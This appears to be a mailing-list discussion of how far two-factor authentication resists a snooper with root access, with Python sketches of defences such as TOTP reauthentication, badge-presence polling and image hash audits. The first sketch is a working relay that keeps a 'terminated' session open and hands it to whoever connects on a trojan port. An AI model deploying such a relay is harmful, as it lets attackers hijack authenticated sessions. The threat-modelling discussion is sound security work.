To me this suggests that the real marginal benefit of ALL of the
two-factor authentication methods, SecurID or OTPW or whatever, is that
it raises the bar a tiny bit on a snooper presumed to have root control
of a system one is coming in from.  Really, just a tiny bit.  I don't
think that it would be terribly difficult to write a general purpose
network module for any operating system that could both sit in the
middle and offer up a trojan port for a third party to come in at will
and take over the "terminated" session(s) from an arbitrary
remote/breakout site.  The attacker might not have the convenience of
being able to login as you whenever they want, as the session in
question cannot be restarted once THEY choose to terminate it, but hey,
do they NEED to be able to restart it or can they do tremendous damage
at the end of the one session?  I rather think the latter.
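
(A crude user-space sketch of the idea, standing in for the kernel network
module described above; it assumes a plaintext protocol and made-up hosts and
ports, so take it as illustration only.  The relay passes traffic through
normally, but when the user "terminates" the session it quietly keeps the
upstream side open and hands it to whoever shows up on the trojan port.)

import select
import socket

UPSTREAM = ("target.example.org", 23)   # hypothetical plaintext service
LOCAL_PORT = 2323                       # the victim's client connects here
TROJAN_PORT = 31337                     # the attacker takes over here

def serve_one_session():
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", LOCAL_PORT))
    listener.listen(1)
    owner, _ = listener.accept()        # the legitimate, authenticated user

    upstream = socket.create_connection(UPSTREAM)

    trojan = socket.socket()
    trojan.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    trojan.bind(("0.0.0.0", TROJAN_PORT))
    trojan.listen(1)

    while True:
        watched = [upstream, trojan] + ([owner] if owner else [])
        readable, _, _ = select.select(watched, [], [])
        s = readable[0]                 # one event per pass keeps this simple
        if s is trojan:                 # third party inherits the live session
            newcomer, _ = trojan.accept()
            if owner:
                owner.close()
            owner = newcomer
        elif s is upstream:
            data = upstream.recv(4096)
            if not data:
                return                  # server closed: session really over
            if owner:
                owner.sendall(data)
        else:                           # the current owner sent something
            data = s.recv(4096)
            if not data:                # user "terminated" the session...
                owner.close()
                owner = None            # ...but the upstream side stays alive
            else:
                upstream.sendall(data)

serve_one_session()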

For SecurID, you can set up your application to periodically reauthenticate,
either on a clock schedule or when you ask to do things that are particularly
sensitive (>ftp GET "nuclear weapon release code"... Please reauthenticate..).
Since knowing the pseudorandom 6-digit number now doesn't help you some 60
seconds into the future, you can make this pretty strong (at the cost of
annoyance).
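
(For illustration, a minimal sketch of the time-window property, using RFC
6238 TOTP in place of SecurID's proprietary token algorithm; the seed and the
60-second step below are assumptions, not anything RSA ships.)

import hashlib
import hmac
import struct
import time

def totp(secret: bytes, at: float, step: int = 60, digits: int = 6) -> str:
    """RFC 4226/6238-style code: HMAC over the time-step counter, truncated."""
    counter = int(at // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    word = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(word % 10 ** digits).zfill(digits)

SECRET = b"hypothetical-token-seed"   # provisioned to the physical token
now = time.time()
print("code now:    ", totp(SECRET, now))
print("code in 60s: ", totp(SECRET, now + 60))  # a captured code goes stale

The reauthentication policy then just amounts to refusing the sensitive
operation unless a code from the current window has been presented.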

For FIPS 201 badges, since they have both contact and contactless interfaces, 
you can use a strategy where the initial authentication is via the contact 
interface (which can see the crypto engine), and then you periodically ping the 
RFID part to make sure that the physical badge is still in the vicinity. (Or, 
more painfully, make it so that the badge has to be always connected.. But that 
raises real usability issues with having two computers.)
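
(Sketched below, with hypothetical badge_is_present()/lock_session() hooks
standing in for whatever your PC/SC reader stack actually provides:
authenticate once over the contact interface, then just poll for presence.)

import time

POLL_SECONDS = 15   # assumed polling interval

def badge_is_present(badge_uid: str) -> bool:
    """Hypothetical hook: ask the contactless reader if this badge is in range."""
    raise NotImplementedError

def lock_session() -> None:
    """Hypothetical hook: lock the screen / drop cached credentials."""
    raise NotImplementedError

def presence_watchdog(badge_uid: str) -> None:
    # Runs after the strong (contact-interface) authentication has succeeded.
    while True:
        time.sleep(POLL_SECONDS)
        if not badge_is_present(badge_uid):
            lock_session()   # badge walked away: end the session
            return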

As always, the idea is to require both "a thing you know" and "a thing you 
have".. The man in the middle can figure out the thing you know (e.g., by a 
spoof interface that grabs keystrokes), but it's tough to emulate the "thing 
you have", since its behavior over time isn't predictable.


IMO a secure login from a Windows box is an oxymoron, no matter what the
authentication factors used or software interface in question might be,
but alas, I haven't yet seen questions on a due-diligence form that
mandate the non-use of Windows systems as clients permitted to access
the protected data/server.

I would qualify the "Windows box" term.. If you lock down the software 
configuration, I think one can make sure it's relatively secure.  If you allow 
casual admin access to install whatever apps you want, then, yes, it's 
insecure.  However, most banks (for example) do NOT do this, at least for 
in-house PCs.. They rigorously control the software image (to the extent that 
you boot from a shared image over the network).. The only thing on the local 
disk is essentially a "cache" which gets compared/refreshed against the master 
image.  No sticking in random USB widgets either.. If it looks like a disk 
drive, it gets encrypted (causing wailing and gnashing of teeth for employees 
who plug their MP3 players or cameras in).
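
(A toy version of that compare/refresh step, with a made-up manifest and
paths: hash each local file against the master image's manifest and flag
anything that has drifted.)

import hashlib
import pathlib

# Hypothetical master-image manifest: relative path -> expected SHA-256.
MANIFEST = {
    "bin/app.exe": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
}

def sha256_of(path: pathlib.Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def audit(root: pathlib.Path) -> list[str]:
    """Return paths whose local "cache" copy no longer matches the master image."""
    drifted = []
    for rel, expected in MANIFEST.items():
        local = root / rel
        if not local.exists() or sha256_of(local) != expected:
            drifted.append(rel)   # would be refreshed from the network image
    return drifted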


And yes, they DO have a variety of processes in place to require business 
partners to have appropriately secured systems.

Where it gets loose is the "customer contact at home" end, where they're 
trading off annoyance of customers against security.  This is like the credit 
card fraud situation.. If you lock it down, nobody will be able to use the 
card, so you trade off some losses (a few percent) against having volume.